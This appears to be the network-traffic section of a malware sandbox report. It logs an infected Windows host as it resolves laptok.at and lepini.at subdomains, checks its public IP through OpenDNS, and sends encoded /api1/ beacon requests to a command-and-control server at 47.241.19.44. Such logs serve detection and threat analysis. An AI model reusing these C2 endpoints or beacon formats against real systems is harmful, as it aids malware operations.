Nov 23, 2020 12:19:09.289078951 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.289136887 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.328711033 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.328738928 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.328756094 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.328778028 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.328866959 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.328929901 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550035954 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550065041 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550081968 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550097942 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550115108 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550132990 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550154924 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550175905 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550188065 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550194025 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550199986 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550223112 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550245047 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550252914 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550263882 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550271988 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550276995 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550312042 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.589838982 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.589890957 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.589927912 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.589961052 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.590002060 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.590055943 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.590111017 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.590125084 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.703165054 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.703186989 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.703342915 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.743204117 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.743437052 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811219931 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811278105 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811316013 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811347008 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811383963 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811430931 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811444998 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811475039 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811486006 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811515093 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811518908 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811554909 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811558008 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811582088 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811593056 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811621904 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811630964 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811661959 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811671019 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811709881 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811733007 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811760902 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811767101 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811798096 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.812103987 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.910643101 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910705090 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910756111 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910809040 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910837889 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.910852909 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910880089 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.910887003 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.910892963 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910912037 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.910934925 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910973072 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.911006927 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.911010981 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.911046982 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.911086082 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.950620890 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950691938 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950737000 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950777054 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950814962 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950851917 CET	80	49732	47.241.19.44	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2020 12:18:46.570199013 CET	49257	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:46.597249031 CET	53	49257	8.8.8.8	192.168.2.4
Nov 23, 2020 12:18:47.557322979 CET	62389	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:47.593255997 CET	53	62389	8.8.8.8	192.168.2.4
Nov 23, 2020 12:18:52.284771919 CET	49910	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:52.312025070 CET	53	49910	8.8.8.8	192.168.2.4
Nov 23, 2020 12:18:53.012953043 CET	55854	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:53.040066004 CET	53	55854	8.8.8.8	192.168.2.4
Nov 23, 2020 12:18:54.080920935 CET	64549	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:54.107846022 CET	53	64549	8.8.8.8	192.168.2.4
Nov 23, 2020 12:18:54.919960022 CET	63153	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:54.947187901 CET	53	63153	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:01.407439947 CET	52991	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:01.434551954 CET	53	52991	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:06.562824011 CET	53700	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:06.599641085 CET	53	53700	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:07.614770889 CET	51726	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:07.939614058 CET	53	51726	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:08.168842077 CET	56794	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:08.196083069 CET	53	56794	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:11.244085073 CET	56534	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:11.271193027 CET	53	56534	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:12.320729017 CET	56627	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:12.348102093 CET	53	56627	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:13.540397882 CET	56621	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:13.581149101 CET	53	56621	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:13.780139923 CET	63116	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:13.807528973 CET	53	63116	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:15.260731936 CET	64078	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:15.287969112 CET	53	64078	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:16.150295973 CET	64801	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:16.177867889 CET	53	64801	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:17.680984020 CET	61721	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:17.708213091 CET	53	61721	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:18.798482895 CET	51255	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:18.834115028 CET	53	51255	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:18.878098965 CET	61522	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:18.905194044 CET	53	61522	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:19.683197975 CET	52337	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:19.718893051 CET	53	52337	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:22.286604881 CET	55046	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:22.322698116 CET	53	55046	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:22.796526909 CET	49612	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:22.836855888 CET	53	49612	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:23.244935036 CET	49285	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:23.280853033 CET	53	49285	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:23.602293015 CET	50601	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:23.638015032 CET	53	50601	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:23.649595022 CET	60875	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:23.693440914 CET	53	60875	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:23.849045992 CET	56448	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:23.876090050 CET	53	56448	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:23.937958002 CET	59172	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:23.975613117 CET	53	59172	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:24.375437021 CET	62420	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:24.411318064 CET	53	62420	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:24.816014051 CET	60579	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:24.853601933 CET	53	60579	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:25.177424908 CET	50183	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:25.204924107 CET	53	50183	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:25.393731117 CET	61531	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:25.434168100 CET	53	61531	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:26.042188883 CET	49228	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:26.078011036 CET	53	49228	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:26.454986095 CET	59794	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:26.490641117 CET	53	59794	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:36.530822039 CET	55916	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:36.566790104 CET	53	55916	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:37.518486977 CET	55916	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:37.554110050 CET	53	55916	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:38.533106089 CET	55916	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:38.560381889 CET	53	55916	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:39.905623913 CET	52752	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:39.942928076 CET	53	52752	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:40.548924923 CET	55916	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:40.584266901 CET	53	55916	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:44.549137115 CET	55916	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:44.584777117 CET	53	55916	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:59.753671885 CET	60542	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:59.789554119 CET	53	60542	8.8.8.8	192.168.2.4
Nov 23, 2020 12:20:09.503115892 CET	60689	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:20:09.530307055 CET	53	60689	8.8.8.8	192.168.2.4
Nov 23, 2020 12:20:09.535417080 CET	60690	53	192.168.2.4	208.67.222.222
Nov 23, 2020 12:20:09.552117109 CET	53	60690	208.67.222.222	192.168.2.4
Nov 23, 2020 12:20:09.553596020 CET	60691	53	192.168.2.4	208.67.222.222
Nov 23, 2020 12:20:09.570106983 CET	53	60691	208.67.222.222	192.168.2.4
Nov 23, 2020 12:20:09.586766005 CET	60692	53	192.168.2.4	208.67.222.222
Nov 23, 2020 12:20:09.603360891 CET	53	60692	208.67.222.222	192.168.2.4
Nov 23, 2020 12:20:13.144649029 CET	64206	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:20:13.472007036 CET	53	64206	8.8.8.8	192.168.2.4
Nov 23, 2020 12:20:14.278291941 CET	50904	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:20:14.305594921 CET	53	50904	8.8.8.8	192.168.2.4
Nov 23, 2020 12:20:15.013784885 CET	57525	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:20:15.049266100 CET	53	57525	8.8.8.8	192.168.2.4
Nov 23, 2020 12:20:17.777049065 CET	53814	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:20:17.820941925 CET	53	53814	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 23, 2020 12:19:07.614770889 CET	192.168.2.4	8.8.8.8	0x39b8	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:13.540397882 CET	192.168.2.4	8.8.8.8	0x12c8	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:18.798482895 CET	192.168.2.4	8.8.8.8	0x2e40	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:59.753671885 CET	192.168.2.4	8.8.8.8	0x48d6	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.503115892 CET	192.168.2.4	8.8.8.8	0x4f3c	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.535417080 CET	192.168.2.4	208.67.222.222	0x1	Standard query (0)	222.222.67.208.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Nov 23, 2020 12:20:09.553596020 CET	192.168.2.4	208.67.222.222	0x2	Standard query (0)	myip.opendns.com	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.586766005 CET	192.168.2.4	208.67.222.222	0x3	Standard query (0)	myip.opendns.com	28	IN (0x0001)
Nov 23, 2020 12:20:13.144649029 CET	192.168.2.4	8.8.8.8	0x78fd	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:15.013784885 CET	192.168.2.4	8.8.8.8	0xd522	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 23, 2020 12:19:07.939614058 CET	8.8.8.8	192.168.2.4	0x39b8	No error (0)	api10.laptok.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:13.581149101 CET	8.8.8.8	192.168.2.4	0x12c8	No error (0)	api10.laptok.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:18.834115028 CET	8.8.8.8	192.168.2.4	0x2e40	No error (0)	api10.laptok.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:59.789554119 CET	8.8.8.8	192.168.2.4	0x48d6	No error (0)	c56.lepini.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.530307055 CET	8.8.8.8	192.168.2.4	0x4f3c	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.552117109 CET	208.67.222.222	192.168.2.4	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Nov 23, 2020 12:20:09.570106983 CET	208.67.222.222	192.168.2.4	0x2	No error (0)	myip.opendns.com		84.17.52.25	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.603360891 CET	208.67.222.222	192.168.2.4	0x3	Name error (3)	myip.opendns.com	none	none	28	IN (0x0001)
Nov 23, 2020 12:20:13.472007036 CET	8.8.8.8	192.168.2.4	0x78fd	No error (0)	api3.lepini.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:15.049266100 CET	8.8.8.8	192.168.2.4	0xd522	No error (0)	api3.lepini.at		47.241.19.44	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49732	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:19:08.224163055 CET	318	OUT	GET /api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 12:19:09.288871050 CET	331	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:19:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a 45 a2 a3 40 14 45 17 c4 00 b7 21 0e c1 5d 66 b8 bb b3 fa fe bd 81 24 54 bd 77 ef 39 49 f4 28 f5 80 1e 1b f5 c3 d7 e8 32 b6 1e 44 19 b6 25 18 f1 73 f9 10 eb 3a 0e 2d 86 57 cb 8b 31 81 b4 a0 96 0f 75 5e f5 83 4d d7 da 30 71 34 e7 ba a8 ca e2 b8 9e 60 32 ac 30 a5 c5 d9 d4 e8 c1 cc 07 18 92 5d ca 65 a0 33 b1 0a e4 b2 29 f3 47 24 1f 9d 98 0a 61 d6 fc c0 53 b6 74 70 fb 51 3b 56 75 39 3d 85 11 28 8e 32 47 2c 62 8b 15 3c 7c 3c a0 a1 70 3f 14 6f 51 dd aa d8 c5 65 30 29 26 30 11 f2 37 54 2d 85 6a cb 07 05 62 bf 52 ba 45 74 65 c8 ea 14 84 00 1e 81 de 81 a6 75 1b 7e 23 c8 9e be 5d 2a c6 82 93 fd a0 e4 e6 13 86 5d 80 bc 85 d1 3a 12 e3 5d 62 f7 33 4e bb 09 ea 5f 35 ae 8e d3 e4 41 b3 d1 cf 54 fb 11 46 1c ef cf 70 ba a4 a6 c6 7a 1f 91 11 c4 82 55 d0 5e f2 b5 9a 7d 2d ac 71 50 ed b5 0b 0d 85 09 28 65 bb a9 9f 1e 02 7d 20 d8 3e fa 16 27 11 e4 4f 15 0d 03 11 13 75 ce 8d a4 e5 d9 39 92 d1 59 c7 20 1c ff 53 02 fc d7 9c 06 59 df fe 48 37 dd cf 6c cb 67 69 d7 6e 58 ea 35 ae 8b 5f 7c da f0 8e 46 cf 48 df 62 2a 03 b6 ac 52 7a d1 02 10 94 21 64 6f d1 38 e0 36 b1 83 77 92 46 ee 0a 58 ee 08 7e c8 24 16 c6 ba 3e f9 bf fc d1 03 35 6b f5 c2 fa dd cb 4d ad d1 df 4b 64 87 8c 1a 8e 11 93 9f f5 44 cd 94 c6 9f 1d 17 ae 42 ce e7 ae bf 27 45 6e 0e 2d 5b c9 48 94 e6 4d bf 9f 17 d2 6b 32 f8 86 9b c0 70 cd c8 ad 46 99 6d b6 69 0d 33 4c c6 77 51 f8 6d 0c 43 7f bc 2b eb 5e 56 93 a2 fa 06 8c 8a 3d 58 52 65 54 4b 10 08 0c 63 27 9f 95 78 4e 5b 1f cf 4f f7 b6 96 33 64 46 a1 d2 49 57 7b 1a e8 d8 d8 c1 28 c9 d0 bd 9c 21 bb dc 97 50 bf 67 a8 0a 56 5f 10 aa 7c 0c 14 70 b4 97 a9 ae e3 f6 9d 16 7f 25 0e 21 f7 30 c7 5d 66 38 c5 73 12 65 9b 82 90 3e d6 f4 69 b4 84 af f3 e8 c9 62 a1 fc 5b 9d 35 3a 63 45 29 ec c6 4c e1 65 32 6f 57 25 fc d6 dd 15 bd f7 c0 94 47 6a 98 99 99 6e ca 3e b1 29 a6 09 7b 09 e2 f7 15 f2 ee 48 e8 10 43 a8 7b f3 cb fe 9c 45 71 75 55 8d 95 11 e4 04 79 34 fc ea cb 22 5c c3 9f 98 e0 fb 82 63 77 17 b4 52 cb 88 da 40 13 80 7a a5 ee 04 b3 99 23 3a 95 59 28 75 b1 b3 47 80 e1 ef 5e 54 07 d4 3a 79 4f 30 42 2e 62 b4 3e 61 36 e2 e8 48 2d 5c fe aa e0 5d 14 1c 57 ed b0 ea d1 09 f5 6e 0e 26 6c e8 ad 0e b6 20 59 c4 9b 49 58 c9 1b 22 17 77 6c 95 9c c3 c7 3a a1 17 5b da 1b 21 5c 59 1d 86 0e f1 26 dd 68 05 be 47 c1 8b c8 f5 43 fd b0 cc 9d a9 12 75 dc e0 f8 1b f6 31 67 b9 27 ed 41 2a cd 9a bd 28 9c ad c3 14 f7 58 11 30 9b 61 31 25 2c ed 5e 7a 0b 6c 55 18 65 62 e1 87 89 4d d7 8a 0e e6 d1 42 6d ad 01 30 0f 08 ca 2a 27 06 66 99 30 f3 09 5b 71 7b bf 6c fc 9d a1 cc f5 03 cf 65 3a 44 19 6d b4 8f 03 86 8b 46 8a b1 ae 97 f7 65 c6 a5 32 26 39 4e 74 c2 6f 02 44 dd 71 10 7a ac 28 8c 34 1a 5b 65 09 bd 99 1f 78 14 5c 67 59 a5 1d e9 af 0f 63 a2 ac 8e 6a 6f 3d ad 43 4e d7 dd e8 b6 49 f9 eb 9d 7e 50 f0 71 ca 9b 3b dd 3a 8c ab f6 38 d9 2d 3e 8d b4 00 92 e2 30 e1 50 c7 7d 6b 41 75 1f 19 bd 35 b4 de 11 df 4a e9 37 51 ea 82 08 cf be af ca b3 71 ee a8 51 0e 6d b9 92 d4 f3 04 0e 47 2f 61 73 20 26 cd 15 f6 ba 1d 28 96 10 8f 63 0e 39 8f b3 c6 84 62 72 60 0d 14 3e c2 7c 6b 84 33 a8 d5 aa 47 3c 0b 01 6e e0 eb 15 76 2b 17 f7 03 93 75 88 bd f4 b2 ff fd 24 9c 06 5a 05 80 8a c4 7a Data Ascii: 2000E@E!]f$Tw9I(2D%s:-W1u^M0q4`20]e3)G$aStpQ;Vu9=(2G,b<\|<p?oQe0)&07T-jbREteu~#]]:]b3N_5ATFpzU^}-qP(e} >'Ou9Y SYH7lginX5_\|FHbRz!do86wFX~$>5kMKdDB'En-[HMk2pFmi3LwQmC+^V=XReTKc'xN[O3dFIW{(!PgV_\|p%!0]f8se>ib[5:cE)Le2oW%Gjn>){HC{EquUy4"\cwR@z#:Y(uG^T:yO0B.b>a6H-\]Wn&l YIX"wl:[!\Y&hGCu1g'A(X0a1%,^zlUebMBm0'f0[q{le:DmFe2&9NtoDqz(4[ex\gYcjo=CNI~Pq;:8->0P}kAu5J7QqQmG/as &(c9br`>\|k3G<nv+u$Zz

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49733	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:19:11.081012964 CET	545	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 12:19:11.865336895 CET	554	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 23 Nov 2020 11:19:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49738	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:19:13.860515118 CET	574	OUT	GET /api1/HCmdTF9ssS2xPQYmTqbko/QSaXs_2BFCMwb9WJ/TzYhMx5eXoG7h0c/n88BmwhZe9ijt5oT_2/Fx6667KDX/SidvZb9thKv8bvTE_2Bd/bd09MXr6sZJK_2B0qyS/ttipC86Fa_2BhWcPHgFDgb/FLKb2aUcMy7Ws/o6qiRO8c/nNeTK_2FSOWylkimJJN1ZPK/7CLWQhh7_2/FsBidPde1di4dmq_2/FoYbJ3dZ5_2F/jbxcTO3nXc9/SExxKRXHJLHHvI/_2BhbueQTaU2MuoAANkGM/Ms1_0A_0DsFCZtvF/RsiXqTx0w_2B7BA/8qwDi436YGxlKYNqBk/I9GfQ7ay9/1WHi9CeL/hOQKKrEqdJo6/k HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
